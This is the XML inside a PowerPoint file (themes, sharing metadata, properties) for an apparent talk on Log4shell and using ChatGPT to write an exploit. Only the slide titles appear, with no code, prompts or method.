  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="UnofficialFY24TemplateBase" id="{43D7F8CE-799F-974E-8F79-3D19ED285221}" vid="{1575B4E9-1F0B-2A44-B37E-EBE972017F08}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Dark Mode">
  <a:themeElements>
    <a:clrScheme name="Custom 2">
      <a:dk1>
        <a:srgbClr val="242626"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="F3F3F3"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003A4C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="00B3E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2E369"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="A34840"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F26B5E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="93D2BD"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C8986"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="000000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B3E6"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="003A4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marL="342900" indent="-342900" algn="l">
          <a:spcAft>
            <a:spcPts val="1200"/>
          </a:spcAft>
          <a:buClr>
            <a:schemeClr val="bg2"/>
          </a:buClr>
          <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          <a:buChar char="•"/>
          <a:defRPr sz="1600" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Veracode_Powerpoint_Template_2022-KB_050322  -  Read-Only" id="{B20635BB-CF94-8849-805C-692CF89E182C}" vid="{767D6194-6B80-A044-9B7A-9E3053AEE38E}"/>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1375e6be-4d1b-4008-a98d-5c63090be2ed">
      <UserInfo>
        <DisplayName>Johnny Wong</DisplayName>
        <AccountId>15</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Sherri McGurnaghan</DisplayName>
        <AccountId>16</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>NT Service\spsearch</DisplayName>
        <AccountId>9</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Peter Harteveld</DisplayName>
        <AccountId>20</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>SharingLinks.9f30dc22-9154-4fed-9538-70eaff1f0f7d.Flexible.fdcb5ece-a42c-411d-9637-27b72c09d4ee</DisplayName>
        <AccountId>21</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Limited Access System Group For Web 1375e6be-4d1b-4008-a98d-5c63090be2ed</DisplayName>
        <AccountId>23</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Julian Totzek-Hallhuber</DisplayName>
        <AccountId>12</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ruth Pope</DisplayName>
        <AccountId>24</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>John Equi</DisplayName>
        <AccountId>27</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Christine Hausammann</DisplayName>
        <AccountId>28</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ben Stoll</DisplayName>
        <AccountId>29</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Tania Monteiro</DisplayName>
        <AccountId>30</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>SharingLinks.37c0465c-43ac-4ac6-94d8-30bd03d3507f.OrganizationView.0d714c38-c24a-43ad-9d15-1a3f6a17eea4</DisplayName>
        <AccountId>25</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Henry Zeng</DisplayName>
        <AccountId>31</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>SharingLinks.2b5d1aa9-5c59-4b21-90d1-1633b8d96838.Flexible.1f9b7f68-ac7d-4152-afa1-e32776df3767</DisplayName>
        <AccountId>32</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Allyson MacLaren</DisplayName>
        <AccountId>33</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Brian Roche</DisplayName>
        <AccountId>63</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Jennifer Buckingham</DisplayName>
        <AccountId>106</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Vince Hinojosa</DisplayName>
        <AccountId>108</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Andrzej Szaryk</DisplayName>
        <AccountId>110</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Antonio Reche</DisplayName>
        <AccountId>112</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Andy Sutcliffe</DisplayName>
        <AccountId>113</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Gregory Domagala</DisplayName>
        <AccountId>93</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>John Smith</DisplayName>
        <AccountId>19</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Michael Man</DisplayName>
        <AccountId>114</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Matthew Salmon</DisplayName>
        <AccountId>115</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Oscar Rodriguez</DisplayName>
        <AccountId>87</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ray Henkel</DisplayName>
        <AccountId>116</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Roan Linde</DisplayName>
        <AccountId>59</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Rafael Maia de Amorim</DisplayName>
        <AccountId>88</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Siddell Bloodsaw</DisplayName>
        <AccountId>117</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Vincent Shichao Deng</DisplayName>
        <AccountId>118</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>David Casa</DisplayName>
        <AccountId>119</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Eric Kim</DisplayName>
        <AccountId>89</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kevin Rise</DisplayName>
        <AccountId>120</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Max Hufft</DisplayName>
        <AccountId>121</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Robert Larkin</DisplayName>
        <AccountId>73</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Aaron Butler</DisplayName>
        <AccountId>54</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Andrew Cluttey</DisplayName>
        <AccountId>61</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Christian Dalomba</DisplayName>
        <AccountId>13</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Glenn Whittemore</DisplayName>
        <AccountId>45</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Juan Mazo</DisplayName>
        <AccountId>84</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Luke Deschenes</DisplayName>
        <AccountId>37</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Vincenzo Guglielmo</DisplayName>
        <AccountId>122</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>April Sauer</DisplayName>
        <AccountId>17</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Scott Simpson</DisplayName>
        <AccountId>10</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Cody Bertram</DisplayName>
        <AccountId>18</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Clint Pollock</DisplayName>
        <AccountId>123</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>David Fisher</DisplayName>
        <AccountId>124</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Chris Tyson</DisplayName>
        <AccountId>125</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ed Gannaway</DisplayName>
        <AccountId>126</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Gregory Wolford</DisplayName>
        <AccountId>127</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Jay Mithani</DisplayName>
        <AccountId>91</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Thomas Lofgren</DisplayName>
        <AccountId>82</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Gary Deschenes</DisplayName>
        <AccountId>94</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Amanda Andersen</DisplayName>
        <AccountId>128</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Jim Jastrzebski</DisplayName>
        <AccountId>129</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>William Trotter</DisplayName>
        <AccountId>130</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Connor Barry</DisplayName>
        <AccountId>131</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Jamie Rougvie</DisplayName>
        <AccountId>132</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Justin Yao</DisplayName>
        <AccountId>133</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Bryan Rosata</DisplayName>
        <AccountId>134</AccountId>
        <AccountType/>
      </UserInfo>
    </SharedWithUsers>
    <MediaLengthInSeconds xmlns="77909b89-42a8-4c7c-afa9-4c781e0846f7"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4E0C104036BAD4CA6979FADF19724A1" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="fb5ae9d44922339e017070a1158831fb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="77909b89-42a8-4c7c-afa9-4c781e0846f7" xmlns:ns3="1375e6be-4d1b-4008-a98d-5c63090be2ed" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="11f6bb0ca693c6a97d1c2f2e33c78eff" ns2:_="" ns3:_="">
    <xsd:import namespace="77909b89-42a8-4c7c-afa9-4c781e0846f7"/>
    <xsd:import namespace="1375e6be-4d1b-4008-a98d-5c63090be2ed"/>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AutoKeyPoints" minOccurs="0"/>
                <xsd:element ref="ns2:MediaServiceKeyPoints" minOccurs="0"/>
                <xsd:element ref="ns3:SharedWithUsers" minOccurs="0"/>
                <xsd:element ref="ns3:SharedWithDetails" minOccurs="0"/>
                <xsd:element ref="ns2:MediaServiceObjectDetectorVersions"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7909b89-42a8-4c7c-afa9-4c781e0846f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375e6be-4d1b-4008-a98d-5c63090be2ed"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3ACB7F8-27EE-42E6-9A5D-8B65DF71E07E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="1375e6be-4d1b-4008-a98d-5c63090be2ed"/>
    <ds:schemaRef ds:uri="77909b89-42a8-4c7c-afa9-4c781e0846f7"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CFFAF3C8-CA14-4E31-A6DE-3606DBEBE80B}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="1375e6be-4d1b-4008-a98d-5c63090be2ed"/>
    <ds:schemaRef ds:uri="77909b89-42a8-4c7c-afa9-4c781e0846f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4ACC24E-1BD4-48C3-AF13-4A88D4A3E79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Dark Mode</Template>
  <TotalTime>21617</TotalTime>
  <Words>1465</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>200</Paragraphs>
  <Slides>24</Slides>
  <Notes>1</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24</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="36" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Lato Semibold</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>7_Light Mode</vt:lpstr>
      <vt:lpstr>Light Mode</vt:lpstr>
      <vt:lpstr>Light Mode</vt:lpstr>
      <vt:lpstr>1_Dark Mode</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Who am I?</vt:lpstr>
      <vt:lpstr>Why?</vt:lpstr>
      <vt:lpstr>What is Log4shell</vt:lpstr>
      <vt:lpstr>Let’s write an exploit for that! </vt:lpstr>
      <vt:lpstr>Convince ChatGPT to do it</vt:lpstr>
      <vt:lpstr>What do I do with the code?</vt:lpstr>
      <vt:lpstr>Testing/Running it</vt:lpstr>
      <vt:lpstr>Testing/Running it</vt:lpstr>
      <vt:lpstr>Testing/Running it</vt:lpstr>
      <vt:lpstr>Testing/Running it</vt:lpstr>
      <vt:lpstr>Testing/Running it</vt:lpstr>
      <vt:lpstr>Testing/Running it</vt:lpstr>
      <vt:lpstr>DONE!</vt:lpstr>
      <vt:lpstr>Automation?</vt:lpstr>
      <vt:lpstr>Thank you ChatGPT!</vt:lpstr>
      <vt:lpstr>Let’s see what it does</vt:lpstr>
      <vt:lpstr>Let’s see what it does</vt:lpstr>
      <vt:lpstr>Let’s see what it does</vt:lpstr>
      <vt:lpstr>Let’s see what it does</vt:lpstr>
      <vt:lpstr>Let’s see what it does</vt:lpstr>
      <vt:lpstr>DONE!</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Scott Simpson</dc:creator>
  <cp:lastModifiedBy>Julian Totzek-Hallhuber</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <cp:lastPrinted>2023-11-30T23:49:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-17T21:03:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-18T10:16:13Z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0x01010064E0C104036BAD4CA6979FADF19724A1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Order">
    <vt:lpwstr>33561000.0000000</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ComplianceAssetId">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_ExtendedDescription">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="TriggerFlowInfo">
    <vt:lpwstr/>
  </property>
</Properties>
</file>